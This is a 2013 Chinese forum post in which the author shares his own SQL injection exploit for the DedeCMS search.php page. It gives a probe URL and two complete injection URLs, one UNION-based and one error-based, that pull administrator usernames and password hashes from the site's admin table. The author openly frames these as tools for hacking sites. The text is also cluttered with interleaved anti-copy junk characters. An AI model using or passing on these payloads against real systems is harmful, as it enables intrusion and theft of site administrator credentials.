转载不加作者名的没JJ# l8 e& B0 f% ^% v3 z+ |
& l" z0 b9 H _
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
/ `/ F, s* g$ G9 b: D: ]* l( P, K) c- M' J' y
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。4 |: B' K: A& e
7 \) M; @/ O% J* q
我一般是这样测试的:
/ `# }- ?. m. Y; k
, o b7 c G$ b6 w# B' A" a" c提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a. m5 R8 |; b2 X/ I
8 c- w/ h" { I# w3 T
转载不加作者名的没JJ. Y0 ?. h9 |6 r. ?, E2 l" W) c
; J0 a. h3 B/ `2 J
作者:鬼哥
/ A" B9 F3 t8 E, M( g$ e! G/ E+ k$ g+ l$ g; Z8 |6 a
6 V6 g6 f+ U) j, a" h" ?, M
" t# o3 D% \* P- ?+ t1 Y2 H2 I/ x/ F
看结果如果提示
2 G9 G c% r& K1 M% T b0 [' ^: e% c
Safe Alert: Request Error step 2 !
- b, G j: n0 v3 k- x6 L4 b, s- P9 N0 Q; u: T' X
那么直接用下面的exp
, t+ }" B% L8 B7 o* v+ M* Q2 M2 y# K3 \3 k: i6 }
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a) A) n: F& H$ m' a6 q
( j% y" V x( h9 i+ T2 a
1 `5 B0 I5 k3 _看结果如果提示' _) E0 I, f# X d: E
' D; I: U3 d/ V! B2 C; W( D
Safe Alert: Request Error step 1 !
% f- U6 A: ^7 F8 d# m
8 x# W- I8 j3 l; Q( Z# t- v4 k0 P那么直接用下面的exp E6 h) S. X% e" r# a
f' X o, w: a% i Kxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a% v: w% X L8 e& k
8 Q* M, _5 o; p% i6 N; p9 T, B: k$ \; w. ]" @; b) o0 U/ _
如果正常显示证明漏洞不存在了。
, J7 N: H' Q. ~; ?3 h5 M4 j g6 K4 G$ @6 R3 r6 r+ B1 u: u3 W
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对